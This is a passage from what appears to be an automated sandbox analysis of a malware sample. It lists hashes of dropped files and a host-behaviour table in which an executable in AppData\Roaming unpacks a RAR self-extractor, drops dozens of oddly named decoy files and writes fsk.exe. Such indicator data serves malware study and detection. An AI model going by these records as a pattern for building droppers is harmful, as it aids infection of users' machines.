SHA1: c3bc7a5cfe65b1a8923a4e973cb61ad3f53a2010 SHA256: 3066bf4da349b9d21457836b21f7c93acc192238f0bc7d11b7e025d333912cf4 SSDeep: 12:zyFq3eehfEXh/jOXC2dFLFtsEJQzexttYs6EN:zyFMeehfEXJKS4FtJQzKws/ |
|
|
| fxw.dat | 0.56 KB |
MD5:
d91a8f8eded88eab0e4aaeae26cc41b0
SHA1: c82df970ebc990e4b84109ded9d6828ddbcdc418 SHA256: a7aee8330919c3b972c730712e3cf5dd6914cb721d41686d6064332c4c635422 SSDeep: 12:Pw1MoYgVMA+aOjcTM/6htXHDGiC97GuFuRNOBz7CWOjpZCjpBig1:P2M9aOgA/+XHDtC5GuQU7FspMig1 |
|
|
| pvg.pdf | 0.50 KB |
MD5:
3c48e00ff63af49eb112bf815b86e194
SHA1: 9a3c7b57bff99e4d015f9321978de416fbb4143f SHA256: 389f2243a308cc6e9d72c286ede9d886092316bd68e0aded3821cc6e14f7b492 SSDeep: 12:md2KCWWyb4QUEY3dA++kj7gTa14UMYMv9eq5RteTCNVDdju:M2hRycQXY3df+keaC3Y89nRtpdju |
|
|
| upl.dat | 0.49 KB |
MD5:
172db04a2316a11359e01f24b4226bea
SHA1: 4dd3cb5f0bb69cbb9bcd219f78b17417047beffd SHA256: 9a04eea89846e407d4dfceeec3904b501c156dba9d96408b0695c427806344fa SSDeep: 12:KXtgHo8tkNSKuEErBAcVwrn6uyp/gG3eaGItV/xO:KXSHwNvMB3Vw6vp/gG3eTWxO |
|
|
| trh.txt | 0.54 KB |
MD5:
919481955b7fe5419185b0e3f766bfb6
SHA1: 8ee78187c4f4d3e8710e599c788da5de53eca105 SHA256: 5b69ecb8f62eb0b2f69704cc9b53f6186067032905141a0c2dbdb11ac69fa573 SSDeep: 12:ECxhvBRUZ3MLvnc14Q0kZgzRUXXWVPTHAUk9IMf9dDDcdERmA7EijDk521E:59BK3MbncGQzz2PTgUGdvcoXHvkQE |
|
|
| mfj.pdf | 0.59 KB |
MD5:
9d318ae251ab4b948f310ec90553c5b3
SHA1: 9fb7b670788b5905650fce676f7d7edcef75b5a5 SHA256: 8f9dd39e8b9eeac6dd04e7f79fc1f483d60c55f4d291e56ae2295a18a658f9b8 SSDeep: 12:4+fyDXryMHgQgcy6fa6adPK8wKaFH2gfhUC4PIZGuIhOhtb5tqWczn:4+fQHJazIrV/qROhtb5tQn |
|
|
| tqx.dat | 553.42 KB |
MD5:
bbbeff1e02394cb90d5e113821651824
SHA1: 6185df2885feeb063ea0890068852b215ab96793 SHA256: 712a4bfa1830865327fb5c4a69746854d9da8acb12143ea2c7c7150d69fae8cb SSDeep: 6144:hs3kjm88H0hnaU/CwZyxk+7g7bX+g8CJXvlzdNh6qP2F/5Uc8jQnK:hHMUxauCwZy+ieXICJ/ZdN5P2F/xKt |
|
|
| unh.txt | 0.52 KB |
MD5:
6b01737af429275f12d9c515ee8ebb2e
SHA1: 7e94b028100e31ee923653eed557a709db9f4586 SHA256: a770cb2ac9e49a7547e3ca61f43a5c5aaaeaa3bc6b95c95ce7a24653a0a740d3 SSDeep: 12:gG+QfDHyZiQb8mAEGjhIdO2/yYMm7SAGggSfMlIk62ly:cQf2AS8aUWdTy/PAwOk628 |
|
|
| lug.docx | 0.53 KB |
MD5:
2dfb5fb08be4ec49d403e4a21bd91845
SHA1: 022fe98ff5a2d2ac027e173c0739f8608c56373d SHA256: 57f4de3e977c23575a52abb79de0d794391ea210d177a2368f4ebc2269c5e355 SSDeep: 12:GmN9nAjQr5swrQTCWGJPgphVmOBZh+O3nuK/aJSjkztAWYMQ2t:FnAjQTsGhT6tnu57AWXR |
|
|
| tre.bmp | 0.50 KB |
MD5:
0e411c705c5c8d99f833cf3ca0de0907
SHA1: b3be7b2227b7be1c4077f2553de6f9cdd23f7c63 SHA256: f29fc87660b2a1cc5a8fe58f63c196e8250a3d672ae111178e4c7126c06645ce SSDeep: 12:kjeYIY9zPOpGCoa2/KPHWTphJtbiN4HEXAdUXmTksZBxPkaOvDUy:qIWzGpGO2/K0pxC4H/gmTFToIy |
|
|
| ten.jpg | 0.51 KB |
MD5:
c25a1a0d6ae24577bc69672ff54c6ad0
SHA1: 8c53ea61e1ce845486c5824ac8f0e1e4712909ad SHA256: 9a1dfa5ae6122218a28290c649132e4d5b48bdc42aa1e42287b10973b01f9341 SSDeep: 12:gOurKMVUEXjav4kAfKeDWFBT9SrqVaIK99G4226dS61lWjF96:T8XjG9ACKMT9KIKruPC4 |
|
|
| trq.ico | 0.53 KB |
MD5:
ebf1827fbd8ff98a4176f969d1616cd6
SHA1: 26e7a94c38e05e0f519916f1db0e68b0496b5fdc SHA256: 05949c009e7564e653f32fd2a320fcda90fb7a6f3e3ef6120fe460a2799ebfaf SSDeep: 12:0cjz+JBkKSQIQuzhVWSMGS3UBxCrdjnJcTD/lpZxAFV:0cjcBkKZgFVNMFctFU |
|
|
| svl.mp3 | 0.65 KB |
MD5:
71fc5398f431f459431371c8b748ce96
SHA1: 5251f2c12ff1fbb5ece46e508e9f750db0691c86 SHA256: 1e63e4987b0fce6310b3394a3e2d2c089bd29a89de72fb1ff911da61b784726e SSDeep: 12:sqiKX882gtjJKgFXqTCUn4zRR6CK8tVjI/PzR7bmQNETdEgj7:sqiKx2gt1KoXMp4MCK53l76kERV |
|
|
| jwm.jpg | 0.50 KB |
MD5:
df82fc75b6dc77efce4c313959e9f0cd
SHA1: a65b9d77500c98e44414198915ae388881abef78 SHA256: f2dd2af99ace3f04ca3bed819f31f3eddb3ce9622a2a89a5b456e541c326e666 SSDeep: 12:keuLYwVYSwfTc3tbRotkNKTgAKTrqKHbeSDUfmAKCmVgKTdT:k72SwL6bjAKTGLSDGnctRT |
|
|
| rxi.mp3 | 0.56 KB |
MD5:
05b6ad15c5e72cecc2ae7551aa2b2729
SHA1: 5e7f8cae1cae68439e64eccc63b51675dac0eff9 SHA256: 62e928865d75413a669ccd3afca31e2d8aca6edc21a1f710e59095cc5f1b42cf SSDeep: 12:bZXPnQVMUdtCiJObh2jU61LurYMf6Vqwjn5kD2RKx9Qy0a3GVOm:RAVdtC4U7YdZr5k6OGVOm |
|
|
| muu=ksm | 181.65 KB |
MD5:
be9f1ff301429b46c7e000be73f64edb
SHA1: 3c3703fa2017deeb45f07a2da11aa0740cdf6d1a SHA256: d64affc80493ca2a363ab339be4564e062cdc33006a34efce7315524488a299b SSDeep: 96:ICoMd+5mSxgs3IAYyH8IYlMSFMWDwYJ/aOxcG1FNUYs:ICo9xx3Im87DwYJ/aOiG1FNi |
|
|
| abe.ppt | 0.54 KB |
MD5:
d4fff2d71cd8cffc05d907436089d9db
SHA1: d218ea96be9d37c2acf5b360030c2f0d7ab5aa84 SHA256: fe4f0e670b03e01f693fed3538a42eef69aeca3849b93320209f283e8da8bd86 SSDeep: 12:VGwOUJeBXlv7/azhGhzcV8z9tPO/kWEOCWrgmEW3gtgEurYQ+OOgIbN/Yn:8pYeB1vrxJc2z9o/kWEOv8WagWQxx |
|
|
| nbs.xl | 0.50 KB |
MD5:
0ad646e8b9167d14509e274246e392d1
SHA1: 56acb48705e1ccafe2cfb7d3d3f8265e5c4bb929 SHA256: 911bd63bf5f068c6be58ac0a46b38a9f6e58d4e2b5efff627ed9ea21c76e813a SSDeep: 12:euWFzvDizQLI2MxPKjCh5XUxT9T3+Lm0WLvlRRt1ja3M7frb:tm6gGh09T3+uLdHkMj3 |
|
|
| xkh.dat | 0.55 KB |
MD5:
10aa42f3b8cbb6e8190bcf0df0b6fb23
SHA1: 1e3ad25630ccc11885362c25381604d69310b511 SHA256: dd99d9dca4e53ce618f2cf17bacdf080b62f62ff2e0717c4e198851849bd7415 SSDeep: 12:7VU73A4MJAKZl/HYxvuIoEdmsOp8G2r0KGIAsQTTssVMyHqS2dc:74eJVV4xvndnG8GOAsQPHXBl |
|
|
| khj.jpg | 0.52 KB |
MD5:
331467ead4b010a088844ef8845cc2be
SHA1: e3b7e98e55cea9282cc6b6e2ca6717a90287b400 SHA256: 65db5e30a5a78af5072de57a62b02cd128e790fad9a903b0f26eeadb793512f8 SSDeep: 12:S9Ey0f+W+EpcVQUFQCEsHbkjZbVmR7K6KlPMVW2TSNdVy:SR4cVQatEsHgjWeLPMIk |
|
|
| lvi.bmp | 0.60 KB |
MD5:
04d4126e2d6854ae04af042d952832b4
SHA1: 69ad6b02ccbd1c4dc4cab881e5272d7adf268653 SHA256: d5ba075687c7280d528753520c9d7b896f06582336d0b41745c536cac3d726a0 SSDeep: 12:49EjQIRsLTnAF3q2q34xw/kvshIX4yRrFdRzSeZcOdqJN+F9w:q+RLBjfxsPhryFFdRGcqDS9w |
|
|
| xmj.docx | 0.51 KB |
MD5:
8ba8c3966c4149b911c315c36ee8eae8
SHA1: 957bd26e52b1ee7d0d2d49ec5f406718cb47998e SHA256: eb1eb2a40d35f56805a4e5bf68d893b0cac606eca59be5cba08e3dd4e8988adc SSDeep: 12:ldMk1HQviZRY/OReXcvJTbQoRaMIQJOv3QuSf6iJtRq2rZFc:PyvifjRvhgM5JOIPi0vq2lS |
|
|
Host Behavior
File (2203)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | __tmp_rar_sfx_access_check_18129278 | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | tqx.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | muu=ksm | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | svq.mp3 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ddt.ico | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | fsk.exe | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | rxi.mp3 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | trh.txt | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | iqg.mp4 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | vfn.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ggu.bmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | nit.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | gxt.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | pvg.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | jwm.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | sst.ppt | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | unh.txt | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | khj.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | tre.bmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | lqw.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | kcp.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | trq.ico | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | vxa.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | fpj.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | csn.mp4 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | duw.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | abe.ppt | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | fbp.icm | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | xmj.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | svl.mp3 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | dbb.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | nbs.xl | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | mfj.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | mwq.xl | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ten.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | nkp.xl | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | xkh.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | grd.mp3 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | upl.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | evp.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ree.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | qms.xl | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | uvx.jpg | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | nil.pdf | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | nfp.bmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | lug.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | plk.mp4 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | huf.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | alx.docx | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | fxw.dat | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | kcj.icm | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | vch.xl | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | chq.mp3 | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | lvi.bmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C: | - |
|
1 | |
| Create Directory | C:\Users | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Local | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Local\Temp | - |
|
1 | |
| Create Directory | C:\Users\aETAdzjz\AppData\Local\Temp\62890218 | - |
|
1 | |
| Add Search Path | - | - |
|
1 | |
| Get Info | tqx.dat | type = file_attributes |
|
1 | |
| Get Info | tqx.dat | type = file_type |
|
1 | |
| Get Info | muu=ksm | type = file_attributes |
|
1 | |
| Get Info | muu=ksm | type = file_type |
|
1 | |
| Get Info | svq.mp3 | type = file_attributes |
|
1 | |
| Get Info | svq.mp3 | type = file_type |
|
1 | |
| Get Info | ddt.ico | type = file_attributes |
|
1 | |
| Get Info | ddt.ico | type = file_type |
|
1 | |
| Get Info | fsk.exe | type = file_attributes |
|
1 | |
| Get Info | fsk.exe | type = file_type |
|
1 | |
| Get Info | rxi.mp3 | type = file_attributes |
|
1 | |
| Get Info | rxi.mp3 | type = file_type |
|
1 | |
| Get Info | trh.txt | type = file_attributes |
|
1 | |
| Get Info | trh.txt | type = file_type |
|
1 | |
| Get Info | iqg.mp4 | type = file_attributes |
|
1 | |
| Get Info | iqg.mp4 | type = file_type |
|
1 | |
| Get Info | vfn.docx | type = file_attributes |
|
1 | |
| Get Info | vfn.docx | type = file_type |
|
1 | |
| Get Info | ggu.bmp | type = file_attributes |
|
1 | |
| Get Info | ggu.bmp | type = file_type |
|
1 | |
| Get Info | nit.pdf | type = file_attributes |
|
1 | |
| Get Info | nit.pdf | type = file_type |
|
1 | |
| Get Info | gxt.docx | type = file_attributes |
|
1 | |
| Get Info | gxt.docx | type = file_type |
|
1 | |
| Get Info | pvg.pdf | type = file_attributes |
|
1 | |
| Get Info | pvg.pdf | type = file_type |
|
1 | |
| Get Info | jwm.jpg | type = file_attributes |
|
1 | |
| Get Info | jwm.jpg | type = file_type |
|
1 | |
| Get Info | sst.ppt | type = file_attributes |
|
1 | |
| Get Info | sst.ppt | type = file_type |
|
1 | |
| Get Info | unh.txt | type = file_attributes |
|
1 | |
| Get Info | unh.txt | type = file_type |
|
1 | |
| Get Info | khj.jpg | type = file_attributes |
|
1 | |
| Get Info | khj.jpg | type = file_type |
|
1 | |
| Get Info | tre.bmp | type = file_attributes |
|
1 | |
| Get Info | tre.bmp | type = file_type |
|
1 | |
| Get Info | lqw.docx | type = file_attributes |
|
1 | |
| Get Info | lqw.docx | type = file_type |
|
1 | |
| Get Info | kcp.dat | type = file_attributes |
|
1 | |
| Get Info | kcp.dat | type = file_type |
|
1 | |
| Get Info | trq.ico | type = file_attributes |
|
1 | |
| Get Info | trq.ico | type = file_type |
|
1 | |
| Get Info | vxa.docx | type = file_attributes |
|
1 | |
| Get Info | vxa.docx | type = file_type |
|
1 | |
| Get Info | fpj.pdf | type = file_attributes |
|
1 | |
| Get Info | fpj.pdf | type = file_type |
|
1 | |
| Get Info | csn.mp4 | type = file_attributes |
|
1 | |
| Get Info | csn.mp4 | type = file_type |
|
1 | |
| Get Info | duw.pdf | type = file_attributes |
|
1 | |
| Get Info | duw.pdf | type = file_type |
|
1 | |
| Get Info | abe.ppt | type = file_attributes |
|
1 | |
| Get Info | abe.ppt | type = file_type |
|
1 | |
| Get Info | fbp.icm | type = file_attributes |
|
1 | |
| Get Info | fbp.icm | type = file_type |
|
1 | |
| Get Info | xmj.docx | type = file_attributes |
|
1 | |
| Get Info | xmj.docx | type = file_type |
|
1 | |
| Get Info | svl.mp3 | type = file_attributes |
|
1 | |
| Get Info | svl.mp3 | type = file_type |
|
1 | |
| Get Info | dbb.jpg | type = file_attributes |
|
1 | |
| Get Info | dbb.jpg | type = file_type |
|
1 | |
| Get Info | nbs.xl | type = file_attributes |
|
1 | |
| Get Info | nbs.xl | type = file_type |
|
1 | |
| Get Info | mfj.pdf | type = file_attributes |
|
1 | |
| Get Info | mfj.pdf | type = file_type |
|
1 | |
| Get Info | mwq.xl | type = file_attributes |
|
1 | |
| Get Info | mwq.xl | type = file_type |
|
1 | |
| Get Info | ten.jpg | type = file_attributes |
|
1 | |
| Get Info | ten.jpg | type = file_type |
|
1 | |
| Get Info | nkp.xl | type = file_attributes |
|
1 | |
| Get Info | nkp.xl | type = file_type |
|
1 | |
| Get Info | xkh.dat | type = file_attributes |
|
1 | |
| Get Info | xkh.dat | type = file_type |
|
1 | |
| Get Info | grd.mp3 | type = file_attributes |
|
1 | |
| Get Info | grd.mp3 | type = file_type |
|
1 | |
| Get Info | upl.dat | type = file_attributes |
|
1 | |
| Get Info | upl.dat | type = file_type |
|
1 | |
| Get Info | evp.dat | type = file_attributes |
|
1 | |
| Get Info | evp.dat | type = file_type |
|
1 | |
| Get Info | ree.jpg | type = file_attributes |
|
1 | |
| Get Info | ree.jpg | type = file_type |
|
1 | |
| Get Info | qms.xl | type = file_attributes |
|
1 | |
| Get Info | qms.xl | type = file_type |
|
1 | |
| Get Info | uvx.jpg | type = file_attributes |
|
1 | |
| Get Info | uvx.jpg | type = file_type |
|
1 | |
| Get Info | nil.pdf | type = file_attributes |
|
1 | |
| Get Info | nil.pdf | type = file_type |
|
1 | |
| Get Info | nfp.bmp | type = file_attributes |
|
1 | |
| Get Info | nfp.bmp | type = file_type |
|
1 | |
| Get Info | lug.docx | type = file_attributes |
|
1 | |
| Get Info | lug.docx | type = file_type |
|
1 | |
| Get Info | plk.mp4 | type = file_attributes |
|
1 | |
| Get Info | plk.mp4 | type = file_type |
|
1 | |
| Get Info | huf.dat | type = file_attributes |
|
1 | |
| Get Info | huf.dat | type = file_type |
|
1 | |
| Get Info | alx.docx | type = file_attributes |
|
1 | |
| Get Info | alx.docx | type = file_type |
|
1 | |
| Get Info | fxw.dat | type = file_attributes |
|
1 | |
| Get Info | fxw.dat | type = file_type |
|
1 | |
| Get Info | kcj.icm | type = file_attributes |
|
1 | |
| Get Info | kcj.icm | type = file_type |
|
1 | |
| Get Info | vch.xl | type = file_attributes |
|
1 | |
| Get Info | vch.xl | type = file_type |
|
1 | |
| Get Info | chq.mp3 | type = file_attributes |
|
1 | |
| Get Info | chq.mp3 | type = file_type |
|
1 | |
| Get Info | lvi.bmp | type = file_attributes |
|
1 | |
| Get Info | lvi.bmp | type = file_type |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 8192, size_out = 8192 |
|
17 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 7, size_out = 7 |
|
6 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 1048560, size_out = 879166 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 6, size_out = 6 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 28, size_out = 28 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 37, size_out = 37 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 1215, size_out = 1215 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 0, size_out = 0 |
|
22 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 7, size_out = 7 |
|
60 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 1048560, size_out = 879166 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 6, size_out = 6 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 28, size_out = 28 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 37, size_out = 37 |
|
42 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 32768, size_out = 32768 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 32736, size_out = 32736 |
|
19 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 4327, size_out = 4327 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 0, size_out = 0 |
|
1700 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 2889, size_out = 2889 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 299, size_out = 299 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 23958, size_out = 23958 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 463, size_out = 463 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 450, size_out = 450 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 433, size_out = 433 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 38, size_out = 38 |
|
7 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 499, size_out = 499 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 441, size_out = 441 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 482, size_out = 482 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 421, size_out = 421 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 415, size_out = 415 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 424, size_out = 424 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 491, size_out = 491 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 431, size_out = 431 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 451, size_out = 451 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 442, size_out = 442 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 438, size_out = 438 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 483, size_out = 483 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 412, size_out = 412 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 494, size_out = 494 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 422, size_out = 422 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 456, size_out = 456 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 428, size_out = 428 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 530, size_out = 530 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 479, size_out = 479 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 36, size_out = 36 |
|
5 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 419, size_out = 419 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 488, size_out = 488 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 411, size_out = 411 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 429, size_out = 429 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 452, size_out = 452 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 504, size_out = 504 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 414, size_out = 414 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 432, size_out = 432 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 423, size_out = 423 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 489, size_out = 489 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 510, size_out = 510 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 416, size_out = 416 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 449, size_out = 449 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 454, size_out = 454 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 427, size_out = 427 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 459, size_out = 459 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 457, size_out = 457 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | size = 493, size_out = 493 |
|
1 | |
| Write | tqx.dat | size = 566697 |
|
1 | |
| Write | muu=ksm | size = 186007 |
|
1 | |
| Write | svq.mp3 | size = 356 |
|
1 | |
| Write | ddt.ico | size = 349 |
|
1 | |
| Write | fsk.exe | size = 65536 |
|
8 | |
| Write | fsk.exe | size = 60416 |
|
1 | |
| Write | fsk.exe | size = 2304 |
|
6 | |
| Write | fsk.exe | size = 2816 |
|
2 | |
| Write | fsk.exe | size = 16896 |
|
1 | |
| Write | fsk.exe | size = 1024 |
|
2 | |
| Write | fsk.exe | size = 6400 |
|
1 | |
| Write | fsk.exe | size = 5376 |
|
1 | |
| Write | fsk.exe | size = 3072 |
|
1 | |
| Write | fsk.exe | size = 1792 |
|
1 | |
| Write | fsk.exe | size = 512 |
|
2 | |
| Write | fsk.exe | size = 1280 |
|
1 | |
| Write | fsk.exe | size = 10496 |
|
1 | |
